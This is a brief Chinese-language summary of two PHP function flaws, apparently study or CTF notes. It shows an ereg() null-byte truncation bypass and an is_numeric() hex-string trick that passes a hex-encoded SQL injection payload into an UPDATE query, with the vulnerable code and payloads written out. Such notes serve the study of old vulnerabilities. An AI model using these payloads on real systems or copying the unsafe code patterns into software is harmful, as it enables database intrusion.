php函数漏洞总结 1、ereg()截断漏洞 代码:
<?php session_start(); if (isset($_POST['submit'])) { $verifycode = $_POST['verifycode']; $b = false; if (@ereg("^[1-9]+$", $verifycode) === FALSE) { $b = false; echo 'b is false'; } else if (strpos($verifycode, 'xiaoboshifudaiwofei') !== FALSE) { $b = true; echo 'b is true'; } } ?>payload:
9�xiaoboshifudaiwofei2、is_numeric()漏洞 代码:
if(!is_numeric($page)){ die("page must be a number!"); } if($page<1) $page=1; $sql="update page set num=$page"; $res=mysql_my_query($sql); if($res){ echo "<script>alert('update success!');</script>"; echo("<script>location.href='./index.php?action=admin&mode=index'</script>"); }else{ echo "<script>alert('update fail!');</script>"; die(); }php 5.x 版本中 is_numeric 的缺陷 (php7.0 已经修复了 ), 它认为 0x…. 是整数
import binascii a='1 union all select flag,flag,flag,flag from flags' binascii.hexlify(a) 3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773page:
0x3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773